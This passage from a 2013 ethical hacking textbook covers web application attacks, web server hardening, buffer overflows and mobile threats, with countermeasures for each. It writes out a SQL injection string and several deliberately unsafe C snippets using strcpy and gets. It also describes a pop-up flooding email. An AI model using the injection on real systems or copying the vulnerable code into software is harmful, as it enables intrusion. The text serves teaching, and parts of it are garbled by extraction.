programs allow users to submit posts with html and javascript
embedded in them. If for example I was logged in as "john" and
read a message by "joe" that contained malicious javascript in it,
then it may be possible for "joe" to hijack my session just by
reading his bulletin board post.153

154

 SQL Injection
SQL Injection works by the attacker finding an area on a web site
that allows for user input that is not filtered for escape characters.

153
http://www.cgisecurity.com/xss-faq.html
154
http://www.website-guardian.com/ArticleImages/6.jpg
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 289
 Ethical Hacking Part I

User login areas are often targeted because they have a direct link
to the database since credentials are often checked against a user
table of some sort. By injecting a SQL statement, like ‘ ) OR 1=1--,
the attacker can access information stored in the web site’s
database. Of course, the example used above represents a
relatively simple SQL statement. Ones used by attackers are often
much more sophisticated if they know what the tables in the
database are since these complex statements can generally
produce better results.

155

 Command injection:
Command Execution vulnerabilities allow attackers to pass
arbitrary commands to other applications. In severe cases, the
attacker can obtain system level privileges allowing them to attack
the servers from a remote location and execute whatever
commands they need for their attack to be successful.156

155
http://amolpednekar4081.files.wordpress.com/2011/01/sql-inject.png?w=614
156
http://www.applicure.com/solutions/web-application-security
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 290
 Ethical Hacking Part I

157

 Cookies\Session Poisoning:
A cookie is a small piece of text stored on a user's computer by a
web browser. It is sent as an HTTP header by a web server to a web
browser and then sent back unchanged by the browser each time it
accesses that server. A cookie can be used for authenticating,
session tracking, and remembering specific information about
users, such as site preferences or the contents of their electronic
shopping carts.
The process of tampering with the value of cookies is called cookie
poisoning. Poisoning allows an attacker to inject the malicious
content, modify the user’s on-line experience, and obtain the
unauthorized information. A Proxy can be used for rewriting the
session data, displaying the cookie data, and /or specifying a new
or other session identifies in the cookie.

 Buffer Overflow:

A buffer overflow occurs when data written to a buffer, due to

insufficient bounds checking, corrupts data values in memory
addresses adjacent to the allocated buffer. Most commonly this
occurs when copying strings of characters from one buffer to
another. It is used to corrupt the execution stack of a web
application.

157
http://vuln.sg/nullftpserver4.jpg
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 291
 Ethical Hacking Part I

 Authentication Hijacking:
The hacker steals a session once a user has authenticated. Session
hijacking is the act of taking control of a user session after
successfully obtaining or generating an authentication session ID.
Session hijacking involves an attacker using captured, brute forced
or reverse-engineered session IDs to seize control of a legitimate
user's Web application session while that session is still in
progress.158

 Directory traversal / Unicode:

A directory traversal (or path traversal) consists in exploiting
insufficient security validation / sanitization of user-supplied input
file names, so that characters representing "traverse to parent
directory" are passed through to the file APIs.
The goal of this attack is to order an application to access
a computer file that is not intended to be accessible. This attack
exposes the directory structure of the application, and often the
underlying web server and operating system.
Directory traversal is also known as the ../ (dot dot slash)
attack, directory climbing, and backtracking. Some forms of this
attack are also canonicalization attacks.159

 Cryptographic Interception:

Cryptography can be used to send confidential message between

two parties. Encrypted traffic flows through network firewalls and
IDS system and is not inspected. If an attacker is able to take
advantage of a secure channel, he can exploit it more efficiently
than an open channel. Attackers can decrypt encrypted data if
they have access to the encryption key or can derive the encryption
key. Attackers can discover a key if keys are managed poorly or if
they were generated in a non-random fashion. An encryption
algorithm provides no security if the encryption is cracked or is
vulnerable to brute force cracking. Custom algorithms are
particularly vulnerable if they have not been tested.

158
http://www.scribd.com/doc/35607828/17/Authentication-Hijacking
159
http://en.wikipedia.org/wiki/Directory_traversal_attack
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 292
 Ethical Hacking Part I

 Parameter / form tampering:

Websites often pass information from one web page to the next
through URL parameters. For example, if you search on Google,
your search terms will be passed to the results page through the
URL. A hacker can take advantage of this fact to rewrite these
parameters in harmful ways.160

 Cookie Snooping:

In an attempt to protect cookies, site developers often encode the

cookies. Cookie snooping techniques can use a local proxy to
enumerate cookies.

 Log Tampering:

Logs are used to keep track the usage patterns of the application.
Log tampering allows attackers to cover their tracks or alter web
transaction records. Attackers strive to delete logs, modify logs,
change user information, or otherwise destroy evidence of any
attack.

 Error message Interception:

Information in error messages is often rich with site-specific

information which can helps to determine the technologies used in
the web applications.

 Web Services Attack:

Web services allow process-to-process communication between

web applications. An attacker can inject a malicious script into a
web service that will enable disclosure and modification of the
data.

160
http://www.commonplaces.com/inspiring-conversation/team-posts/six-threats-web-application-
security-and-what-you-can-do-about
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 293
 Ethical Hacking Part I

 Zero-Day Attacks:

Zero-day attacks take place between the time vulnerability is

discovered by a researcher or attacker and the time that the
vendor issues a corrective patch. This vulnerability is launching
point for further exploitation of the web application and
environment.

20.5 Hacking Tools:

1. Instant Source: Instant Source tool allows us to see and edit

the HTML source code of the web pages. It can be executed from
Internet.

2. Wget: Wget is a command line tool for Windows and UNIX. Wget
will download the contents of website. It works non-interactively
in the background after the user logs off.

3. Websleuth: Websleuth is a tool that combines spidering with

the capability of a personal proxy.

4. Blackwidow: Black widow is a website scanner, a site mapping

tool, a site ripper, a site mirroring tool, and an offline browser
program.

5. WindowBomb: An email sent this html code attached will create

pop-up windows until the pc’s memory gets exhausted.

6. CookieDigger Tool: It helps to identify weak cookie generation

and insecure implementation of session management by web
application.

7. SSL Digger Tool: It is a tool to assess the strength of SSL

servers by testing the supported ciphers.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 294

 Ethical Hacking Part I

8. Acunetix Web Scanner: Acunetix launches all the Google

hacking database queries onto the crawled content of website.

20.6 Countermeasures:

Threats Countermeasure
 Perform thorough input validation, cookie,
cross-site

query string, form fields and hidden field.
scripting
Adopt Security Policy.
 Perform thorough input validation. Your
SQL Injection application should validate its input prior
to sending a request to the database.
 Use parameterized stored procedures for
database access to ensure that input
strings are not treated as executable
statements. If you cannot use stored
procedures, use SQL parameters when you
build SQL commands.
 Use least privileged accounts to connect to
the database.
Command  Use language-specific libraries that avoid
Injection

problems due to shell commands.
Validate the data to prevent any malicious


content.
Structure requests so that all supplied
parameters are treated as data, rather
than potentially executable content.
 Use an encrypted communication channel
Cookies\Session provided by SSL whenever an
Poisoning authentication cookie is transmitted.
 Use a cookie timeout to a value that forces
authentication after a relatively short time
interval. Although this doesn't prevent
replay attacks, it reduces the time interval
in which the attacker can replay a request
without being forced to re-authenticate
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 295
 Ethical Hacking Part I

because the session has timed out.



Validate input length in forms
Buffer Overflow
Check bounds and maintain extra care
when using loops to copy data
 Use secure channels for authentication
Authentication

methods.
Hijacking
Use cookie in a secure manner where
possible.
 Use built-in encryption routines that
Cryptography
include secure key management. Data
Protection application programming
interface (DPAPI) is an example of an
encryption service provided on Windows
2000 and later operating systems where the


operating system manages the key.
Use strong random key generation
functions and store the key in a restricted
location — for example, in a registry key
secured with a restricted ACL — if you use
an encryption mechanism that requires you


to generate or manage the key.
Encrypt the encryption key using DPAPI for
added security.
 Use strong access controls to protect data
Directory in persistent stores to ensure that only
traversal authorized users can access and modify the
data.
 Use role-based security to differentiate
between users who can view data and users
who can modify data.
 Field Validity Check
Parameter\form
tampering
 Use an encrypted communication channel
Cookie provided by SSL whenever an
Snooping authentication cookie is transmitted.
 Use a cookie timeout to a value that forces
authentication after a relatively short time

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 296

 Ethical Hacking Part I

interval. Although this doesn't prevent

replay attacks, it reduces the time interval
in which the attacker can replay a request
without being forced to re-authenticate
because the session has timed out.
 Secure log files by using restricted ACLs.

Log Tampering
Relocate system log files away from their
default locations.
 Digitally sign and stamp logs.
 Website Cloaking capabilities make
Error message
enterprise web resource invisible to
Interception
attackers
 Turn off web services that are not
Web Services

required for regular operation
Attack

Provision for multiple layer of protection
Block all unknown path.


Enforce stringent security policies
Zero-Day
Deploy firewall161
Attacks

20.7 Hacking Web Servers

This includes knowing their vulnerabilities, as well as understanding the
types of attacks including Internet Information Server (IIS) Unicode
exploits. In addition, you should know when to use patch-management
techniques and understand the methods used to harden web servers.

List the Types of Web Server Vulnerabilities:

Web servers, like other systems, can be compromised by a hacker. The

following vulnerabilities are most commonly exploited in web servers:

 Mis-configuration of the web server software

161
http://www.scribd.com/doc/35607828/17/Authentication-Hijacking
http://msdn.microsoft.com/en-us/library/ff648641.aspx#c02618429_015

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 297

 Ethical Hacking Part I

 Operating system or application bugs, or flaws in programming

code

 Vulnerable default installation of operating system and web server

software, and/or lack of patch management to update operating
system or web server software

 Lack of or not following proper security policies and procedures

Hackers exploit these vulnerabilities to gain access to the web server.

Because web servers are located in a Demilitarized Zone (DMZ), which is
a publicly accessible area between two packet filtering devices, and can
be more easily accessed by the organization’s client systems, an exploit of
a web server offers a hacker easier access to internal systems or
databases.

Attacks against Web Servers :

The most visible type of attack against web servers is defacement.

Hackers deface websites for sheer joy and an opportunity to enhance
their reputations. Defacing a website means the hacker exploits
vulnerability in the operating system or web server software and then
alters the website files to show that the site has been hacked. Often the
hacker displays their hacker name on the website’s home page. Common
website attacks that enable a hacker to deface a website include the
following:

 Capturing administrator credentials through man-in-the-middle

attacks.

 Revealing an administrator password through a brute-force attack.

 Using a DNS attack to redirect users to a different web server.

 Compromising an FTP or e-mail server.

 Exploiting web application bugs that result in a vulnerability.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 298

 Ethical Hacking Part I

 Mis-configuring web shares.

 Taking advantages of weak permissions.

 Rerouting a client after a firewall or router attack.

 Using SQL injection attacks (if the SQL server and web server are
the same system).

 Using Telnet or Secure Shell (SSH) intrusion.

 Carrying out URL poisoning, this redirects the user to a different

URL.

 Using web server extension or remote service intrusion.

 For cookie-enabled security intercept the communication between

the client and the server and change the cookie to make the server
believe that there is a user with higher privileges.

20.8 Web Server Hardening Methods

A web server administrator can do many things to harden a server

(increase its security). The following are ways to increase the
security of the web server:

 Rename the administrator account, and use a strong password.

 Disable default websites and FTP sites.



Remove unused applications from the server, such as WebDAV.
Disable directory browsing in the web server’s configuration
settings.

 Add a legal notice to the site to make potential attackers aware of

the implications of hacking the site.

 Apply the most current patches, hotfixes, and service packs to the
operating system and web server software.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 299
 Ethical Hacking Part I

 Perform bounds-checking on input for web forms and query strings

to prevent buffer overflow or malicious input attacks.

 Disable remote administration.

 Use a script to map unused file extensions to a 404 (“File not

found”) error message.

 Enable auditing and logging.

 Use a firewall between the web server and the Internet and allow
only necessary ports (such as 80 and 443) through the firewall.

 Replace the GET with POST method when sending data to a web
server.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 300

 Ethical Hacking Part I

CHAPTER 21
Buffer Overflow Attack
Objective
21.1 Introduction
21.2 Threats of Buffer Overflow
21.3 Reasons for Buffer Overflow Attack
21.4 What is Stack?
21.5 Types of Overflow
21.6 Buffer Overflow and Web Applications
21.7 Examples
21.8 Countermeasure

On Oct.19, 2000, hundreds of flights were grounded or delayed because

of a software problem in the Los Angeles air traffic control system. The
cause was attributed to a controlling typing 9 characters (instead of five)
of flight description data, resulting in the buffer overflow.

21.1 Introduction
Buffer means temporary data storage area. Buffers are data storage
areas, which generally hold a predefined amount of finite data.
A buffer overflow occurs when a program or process tries to store more
data in a buffer than it was intended to hold. Since buffers are created to
contain a finite amount of data, the extra information is given can
overflow into adjacent buffers, corrupting or overwriting the valid data
held in them. Although it may occur accidentally through programming
error, buffer overflow is an increasingly common type of security attack
on data integrity. In buffer overflow attacks, the extra data may contain
codes designed to trigger specific actions, in effect sending new
instructions to the attacked computer that could, for example, damage
the user's files, change data, or disclose confidential information. Buffer
overflow attacks are said to have arisen because the C programming
language supplied the framework, and poor programming practices
supplied the vulnerability.

In July 2000, a vulnerability to buffer overflow attack was discovered in

Microsoft Outlook and Outlook Express. A programming flaw made it
possible for an attacker to compromise the integrity of the target

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 301

 Ethical Hacking Part I

computer by simply it sending an e-mail message. Unlike the typical e-

mail virus, users could not protect themselves by not opening attached
files; in fact, the user did not even have to open the message to enable
the attack. The programs' message header mechanisms had a defect that
made it possible for senders to overflow the area with extraneous data,
which allowed them to execute whatever type of code they desired on the
recipient's computers. Because the process was activated as soon as the
recipient downloaded the message from the server, this type of buffer
overflow attack was very difficult to defend. Microsoft has since created
a patch to eliminate the vulnerability.162

Malicious hackers can launch buffer overflow attacks wherein data with
instructions to corrupt a system are purposely written into a file in full
knowledge that the data will overflow a buffer and release the
instructions into the computers instructions.163

21.2 Buffer Overflow Threats:

A Buffer Overflow is a flaw that occurs when more data is written to a

block of memory, or buffer, than the buffer is allocated to hold.
Exploiting a buffer overflow allows an attacker to modify portions of the
target process address space. This ability can be used for a number of
purposes, including the following:

 Control the process execution

 Crash the process
 Modify internal variables

The attacker’s goal is almost always to control the target process’

execution. This is accomplished by identifying a function pointer in
memory that can be modified, directly or indirectly, using the overflow.
When such a pointer is used by the program to direct program execution
through a jump or call instruction, the attacker-supplied instruction
location will be used, thereby allowing the attacker to control the
process.

In many cases, the function pointer is modified to reference a location

where the attacker has placed assembled machine-specific instructions.
These instructions are commonly referred to as shell code, in reference to

162
http://searchsecurity.techtarget.com/definition/buffer-overflow
163
http://www.webopedia.com/TERM/B/buffer_overflow.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 302
 Ethical Hacking Part I

the fact that attackers often wish to spawn a command-line environment,

or shell, in the context of the running process.164

21.3 Reasons for Buffer Overflow Attack:

 The lack of boundary testing:

Buffer Overflow attacks depend on two things:

 A machine that can execute a code that resides in the data/stack

segment
The lack of boundary testing is common, and it is usually the ends with
the segmentation fault or bus error.
In order to exploit buffer overflow to gain access to or escalate privileges,
the offender must create the data to be fed to the application. Random
data generates a segmentation fault or bus error, never a remote shell or
the execution of a command.

Process Memory Organization:

To understand stack buffers, we must first understand how a process is
organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.

The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any
attempt to write to it will result in a segmentation violation.

The data region contains initialized and uninitialized data. Static

variables are stored in this region. The data region corresponds to the
data-bss sections of the executable file. Its size can be changed with the
brk system call. If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between
the data and stack segments.

164
http://projects.webappsec.org/w/page/13246916/Buffer%20Overflow
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 303
 Ethical Hacking Part I

165

21.4 What Is A Stack?

A stack is an abstract data type frequently used in computer science. A

stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
last in, first out queue, or a LIFO.

Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at
the top of the stack.

Why Do We Use A Stack?

Modern computers are designed with the need of high-level languages in

mind. The most important technique for structuring programs

165
http://cs.ucla.edu/classes/fall08/cs111/scribe/14/standardmem.gif
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 304
 Ethical Hacking Part I

introduced by high-level languages is the procedure or function. From

one point of view, a procedure call alters the flow of control just as a
jump does, but unlike a jump, when finished performing its task, a
function returns control to the statement or instruction following the
call. This high-level abstraction is implemented with the help of the
stack.

The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from
the function.166

The stack and the heap are storage locations for user-supplied variables
within a running program. Variables are stored in the stack or heap until
the program needs them. Stacks are static locations of memory address
space, whereas heaps are dynamic memory address spaces that occur
while a program is running. A heap-based buffer overflow occurs in the
lower part of the memory and overwrites other dynamic variables. As a
consequence, a program can open a shell or command prompt or stop
the execution of a program. The next section describes stack-based
buffer overflow attacks.

21.5 Types of Buffer Overflows

The two types of buffer overflows are:

Stack-based:
A buffer is simply some fixed space in memory used to store data. In C,
you create a buffer by declaring an array of some primitive type such as
a ‘char array [SIZE] ‘or int ‘array [SIZE] ‘. When these arrays are
declared, the space for their data is allocated on the stack. The key point
is that the space is fixed.
A stack based buffer overflow occurs when more data than what was
allocated is put into the buffer and the excess data “overflows” into other
stack memory space.
Stack-based buffer overflows are exploitable because of the way the stack
allocates stack frames when functions are called. Every time a function is
called the return address to jump back to the previously executing
function is stored on the stack.

166
http://www1.maths.leeds.ac.uk/~read/bofs.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 305
 Ethical Hacking Part I

The data that overflows in the current stack frame can overwrite data in
the previous stack frame, manipulating the return address. Here’s an
example of an exploitable buffer overflow.
#include <stdio.h>
1
2 #include <stdlib.h>
3 #include <string.h>
1
4
5 void function(char *in) {
6 char buf[16];
2
7 strcpy(buf, in);
8 }
3
9
10 int main(int argc, char **argv) {
11 function(argv[0]);
4
12 return 0;
13
}
5
Stack-Based Buffer Overflows
6
The following are the steps a hacker uses to execute a stack-based buffer
overflow:
7
1. Enter a variable into the buffer to exhaust the amount of memory
8 in the stack.

9 2. Enter more data than the buffer has allocated in memory for that
variable, which causes the memory to overflow or run into the
memory space for the next process. Then, add another variable,
and overwrite the return pointer that tells the program where to
return to after executing the variable.

3. A program executes this malicious code variable and then uses the
return pointer to get back to the next line of executable code. If the
hacker successfully overwrites the pointer, then the program
executes the hacker’s code instead of the program code.

Heap-Based Buffer Overflows

Exploitation of a buffer overflow on the heap is similar to exploiting a
stack based overflow, except that no return addresses are stored in this
segment of memory. Therefore, an attacker must use other techniques to
gain control of the execution-flow. An attacker could overwrite a function
pointer or perform an indirect pointer overwrite on pointers stored in
these memory regions, but these are not always available. Overwriting
the memory management information that is generally associated with
dynamically allocated memory is a more general way of exploiting a heap-
based overflow. Memory allocators allocate memory in chunks. These
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 306
 Ethical Hacking Part I

chunks typically contain memory management information (referred to

as chunk info) alongside the actual data (chunk data). Many different
allocators can be attacked by overwriting the chunk info.

We will describe how dynamic memory allocators can be attacked by

focusing on a specific implementation of a dynamic memory allocator
called dlmalloc. Dlmalloc is used as the basis for ptmalloc, which is the
allocator used in the GNU/Linux operating system. Ptmalloc mainly
differs from dlmalloc in that it offers better support for multithreading,
however this has no direct impact on the way an attacker can abuse the
memory allocator’s management information to perform code injection
attacks.

To detect program buffer overflow vulnerabilities that result from poorly

written source code, a hacker sends large amounts of data to the
application via a form field and sees what the program does as a result.

21.6 Buffer Overflow and Web Applications

Attackers use buffer overflows to corrupt the execution stack of a web

application. By sending carefully crafted input to a web application, an
attacker can cause the web application to execute arbitrary code –
effectively taking over the machine.

Buffer overflow flaws can be present in both the web server or application
server products that serve the static and dynamic aspects of the site, or
the web application itself. Buffer overflows found in widely used server
products are likely to become widely known and can pose a significant
risk to users of these products. When web applications use libraries,
such as a graphics library to generate images, they open themselves to
potential buffer overflow attacks.

Buffer overflows can also be found in custom web application code, and
may even be more likely given the lack of scrutiny that web applications
typically go through. Buffer overflow flaws in custom web applications
are less likely to be detected because there will normally be far fewer
hackers trying to find and exploit such flaws in a specific application. If
discovered in a custom application, the ability to exploit the flaw other
than to crash the application is significantly reduced by the fact that the

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 307

 Ethical Hacking Part I

source code and detailed error messages for the application are normally
not available to the hacker.

THE METHOD
For a buffer overrun attack to be possible and be successful, the
following events must occur, and in this order:
1. A buffer overflow vulnerability must be found, discovered, or identified.
2. The size of the buffer must be determined.
3. The attacker must be able to control the data written into the buffer.
4. There must be security sensitive variables or executable program
instructions Stored below the buffer in memory.
5. Targeted executable program instructions must be replaced with other
executable instructions.

Let’s look at each of these five conditional steps individually.

21.7 Example Language: C

Example 1
char last_name[20];
printf ("Enter your last name: ");
scanf ("%s", last_name);
The problem with the code above is that it does not restrict or limit the
size of the name entered by the user. If the user enters
"Very_very_long_last_name" which is 24 characters long, then a buffer
overflow will occur since the array can only hold 20 characters total.
Example 2
The following code attempts to create a local copy of a buffer to perform
some manipulations to the data.
(Bad Code)
Example Language: C
void manipulate_string(char* string){
char buf[24];
strcpy(buf, string);
...
}
However, the programmer does not ensure that the size of the data
pointed to by string will fit in the local buffer and blindly copies the data
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 308
 Ethical Hacking Part I

with the potentially dangerous strcpy() function. This may result in a

buffer overflow condition if an attacker can influence the contents of the
string parameter.
Example 3
The excerpt below calls the gets() function in C, which is inherently
unsafe.
(Bad Code)
Example Language: C
char buf[24];
printf("Please enter your name and press <Enter>\n");
gets(buf);
...
}
However, the programmer uses the function gets() which is inherently
unsafe because it blindly copies all input from STDIN to the buffer
without restricting how much is copied. This allows the user to provide a
string that is larger than the buffer size, resulting in an overflow
condition.
Example 4
In the following example, a server accepts connections from a client and
processes the client request. After accepting a client connection, the
program will obtain client information using the gethostbyaddr method,
copy the hostname of the client that connected to a local variable and
output the hostname of the client to a log file.
(Bad Code)
Example Languages: C and C++
...
struct hostent *clienthp;
char hostname[MAX_LEN];

// create server socket, bind to server address and listen on socket

...

// accept client connections and process requests

int count = 0;
for (count = 0; count < MAX_CONNECTIONS; count++) {

int clientlen = sizeof(struct sockaddr_in);

int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr,
&clientlen);

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 309

 Ethical Hacking Part I

if (clientsocket >= 0) {
clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr,
sizeof(clientaddr.sin_addr.s_addr), AF_INET);
strcpy(hostname, clienthp->h_name);
logOutput("Accepted client connection from host ", hostname);

// process client request

...
close(clientsocket);
}
}
close(serversocket);
...
However, the hostname of the client that connected may be longer than
the allocated size for the local hostname variable. This will result in a
buffer overflow when copying the client hostname to the local variable
using the strcpy method.

21.8 PREVENTION
We must bear in mind that ALL such buffer overflow attacks are
however, an effective vaccine must first be developed.

1. Use Different Language Tools:

Language tools that provide automatic bounds checking such as
Perl, Python, and Java. However, this is usually not possible or
practical when you consider almost all modern operating systems
in use today are written in the C language. The language tool
becomes particularly critical when low-level hardware access is
necessary. The good news is with languages evolving, language and
code security has becoming a serious issue. For example, Microsoft
in their .NET initiative has completely re-written Visual Basic and
Visual C++22 with “string safe” security in mind. Additionally, they
have added the Visual C# tool which was designed from the ground
up with security in mind.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 310

 Ethical Hacking Part I

2. Eliminate The Use Of Flawed Library Functions.

Programming languages are only as flawed as the programmer
allows them to be. In our demonstration, we utilized three flawed
functions from the Standard C Library (gets (), strcpy, and strcmp).
These are just three of many such functions that fail to check the
length or bounds of their arguments. For instance, we could have
completely eliminated the buffer overflow vulnerability in our
demonstration by changing one line of code. This simple change
informs strcpy () that it only has an eight byte destination buffer
and that it must discontinue raw copy at eight bytes. The
persistence of programming errors of this nature may indeed be
related to the manner in which we train and educate young
programmers. One can pick up an introductory college textbook on
C or C++ and find this set of flawed functions introduced by the
third chapter. Sure, they make great training aids. However,
humans are creatures of habit and tend to use what they know
best and are most comfortable with.
3. Design and Build Security within Code:
It takes more work, and it takes more effort, but software can be
designed with security foremost in mind. If 22 Visual C++ is
Microsoft’s proprietary version of the C++ language. The previous
example, we could have yet added one extra step to assure
complete buffer safety: Again, this may go back to how we train
programmers. Is code security taught and encouraged? Are they
given the extra time to design security within their code? Typically,
and unfortunately, the answer to these questions is no23.
4. Use Safe Library Modules:
String safe library modules are available for use, even in
problematic languages such as C++. For instance, the C++
Standard Template Library offers the Class String in its standard
namespace. The String Class provides bounds checking within its
functions and be preferred for use over the standard string
handling functions.
5. Use Available Middleware Libraries:
Several freeware offerings of “safe libraries” are available for use.
For instance, Bell Labs developed the “libsafe24” library to guard
against unsafe function use. Libsafe works on the structure of

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 311

 Ethical Hacking Part I

stack frame linkage through frame pointers by following frame

pointer to the stack frame that allocated a buffer. When a function
executes, it can then prevent the return address from being
overwritten. However, libsafe is not without security problems of its
own as it has been reported that libsafe's protections can be
bypassed in a format-string-based attack by using flag characters
that are used by glibc but not libsafe.

6. Use Source Code Scanning Tools:

Several attempts have been made to design a tool that performs
analysis on raw source code with the hope of identifying
undesirable constructs to include buffer vulnerabilities.

7. Use Compiler Enhancement Tools:

Although a relatively new concept, several compiler add-on tools
have recently been made available that work closely with function
return address space to prevent overwriting.

8. Disable Stack Execution:

Although it requires the operating system kernel to be recompiled,
patches are available for some versions of UNIX that render the
stack non-executable. Since most buffer overrun exploits depend
on an executable stack, this modification will essentially stop them
dead in their tracks.

9. Know What Is On Your System:

Awareness of what is on your system and who has the privileges
to execute it is essential. SUID root executable and root owned
world writable files and directories are the favorite target of many
attacks. Find them, list them, and know them.

10. Patch The Operating System And Application:

Perhaps the very best defense is to stay informed and remain

“offensive”. As new vulnerabilities are discovered and reported,
apply the necessary patches and fixes promptly. If you are in a
Microsoft shop, this may get very tiresome very quickly. It may
even seem like an endless task.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 312

 Ethical Hacking Part I

CHAPTER 22
Mobile Security
Objective
22.1 Introduction
22.2 Challenges of mobile security
22.3 Mobile Vulnerabilities
22.4 Cell Phone Security Measures
22.5 Mobile Related Threats
22.6 Mobile Malwares
22.7 Mobile Based Attacks

22.1 Introduction

Previously mobile users primarily used their mobile devices for voice
communications, with little to no mobile data activity. Data applications
that were available were contained in a walled garden and only available
on the mobile carrier’s network, thus closed off from the rest of the data
world.

However, the walled garden mobile environment has now quickly

changed as mobile devices are becoming more open. These open devices
need open networks to get the full benefit of the openness of the device.
This is pressuring mobile operators to open their networks and allow the
mobile user to do more with their devices. This in turn has led to a new
phenomenon in mobile applications, as mobile users can now access
thousands and thousands of applications.

Mobile commerce performed over these open mobile devices is also

becoming much more prevalent, with many mobile users now getting
more comfortable shopping or purchasing items with their mobile device.
All of these things open the door for mobile carriers to drive new
revenues. It also opens the door for new security threats that can
potentially do harm to mobile users and to the carrier’s revenue streams.

As smart phone sales continue to take off, the potential mobile targets for
hackers to perform malicious acts in order to achieve financial gain will
quickly outnumber those in the computer world. This time is
approaching very quickly and mobile carriers need to prepare now to
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 313
 Ethical Hacking Part I

protect their networks and users from these new threats. The
consequences of not implementing security could have devastating
impacts on the future growth of the mobile industry.167

Consumers aren't the only ones making the shift to mobile devices.
Malicious hackers and identity thieves are following close behind. As
more and more people use their Smartphone’s and other mobile devices
to do online banking, pay bills, and store critical personal and business
information, more and more bad guys are trying to crack into this mobile
device.

Mobile security will be the key to winning the war against this new
generation of cyber thieves. Mobile security can come in many shapes
and forms. Some protections are built directly into the device you're
using.

Other mobile security

protections are built into the
network, such as strong
encryption standards for data
travelling across cellular
networks. But perhaps no
mobile security device is as
powerful as an educated
consumer who keeps his or her
personal information protected
and avoids downloading
suspicious applications or
clicking on booby-trapped
links.168

The key factors that are contributing to the increasing need for mobile
security including:

1. Mobile devices—they are changing dramatically and are now as

powerful as laptops and other computing devices.

167
http://www.juniper.net/us/en/local/pdf/whitepapers/2000314-en.pdf
168
http://money.howstuffworks.com/personal-finance/online-banking/mobile-security.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 314
 Ethical Hacking Part I

2. Open devices and networks—services and applications have moved to

IP and given the user more control, exposing the network and users to
additional security risks.

3. Applications—thousands of applications with billions of download are

now happening.

4. Massive increases in bandwidth from data services—these are

increasing the number of attacks on network signaling and applications
layers.

Mobile security has not traditionally been at the top of the priority list for
most mobile carriers. However, as the mobile industry becomes similar to
the fixed line world and the number of attacks continues to grow
substantially each year, mobile operators need to pay more attention to
securing their networks and subscribers. Without having a multilayer
security architecture in place, mobile attacks could have a dramatic
impact on the growth of the mobile industry.169

22.2 Challenges of mobile security

Threats

A Smartphone user is exposed to various threats when he uses his

phone. These threats can disrupt the operation of the Smartphone, and
transmit or modify the user data. For these reasons,
the applications deployed there must guarantee privacy and integrity of
the information they handle. In addition, since some apps could
themselves be malware, their functionality and activities should be
limited (for example, accessing location information via GPS, address
book, transmitting data on the network, sending SMS that are charged,
etc.).

There are three prime targets for attackers:

 Data: Smartphone’s are devices for data management, therefore

they may contain sensitive data like credit card numbers,

169
http://www.juniper.net/us/en/local/pdf/whitepapers/2000314-en.pdf
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 315
 Ethical Hacking Part I

authentication information, private information, activity logs

(calendar, call logs);

 Identity: Smartphone’s are highly customizable, so the device or

its contents are associated with a specific person. For example,
every mobile device can transmit information related to the owner
of the mobile phone contract, and an attacker may want to steal
the identity of the owner of a Smartphone to commit other
offenses;

 Availability: by attacking a Smartphone you can limit access to it

and deprive the owner of the service

The sources of these attacks are the same actors found in the non-mobile
computing space:

 Professionals, whether commercial or military, who focus on the

three targets mentioned above. They steal sensitive data from the
general public, as well as undertake industrial espionage. They will
also use the identity of those attacked to achieve other attacks;

 Thieves who want to gain income through data or identities they

have stolen. The thieves will attack many people to increase their
potential income;

 Black hat hackers who specifically attack availability. Their goal is

to develop viruses, and cause damage to the device. In some cases,
hackers have an interest in stealing data on devices.

 Grey hat hackers who reveal vulnerabilities. Their goal is to

expose vulnerabilities of the device. Grey hat hackers do not intend
on damaging the device or stealing data.170

170
http://en.wikipedia.org/wiki/Mobile_security
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 316
 Ethical Hacking Part I

22.3 Mobile Vulnerabilities

There have recently been concerns about potential threats and security
issues in mobile phone technologies. Some analysts argue that mobile
phones are vulnerable to the same sort of security risks as PCs. The
truth may be that the situation is worse than that.

Be Aware!
Your cell telephone has
three major vulnerabilities

1. Vulnerability to monitoring of your conversations while using the

phone.

2. Vulnerability of your phone being turned into a microphone to

monitor conversations in the vicinity of your phone while your phone
is inactive.

3. Vulnerability to "cloning," or the use of your phone number by others

to make calls that are charged to your account.

VULNERABILITY TO MONITORING

 All cell telephones are radio transceivers. Your voice is transmitted

through the air on radio waves.

 Radio waves are not directional -- they disperse in all directions so

that anyone with the right kind of radio receiver can listen in.

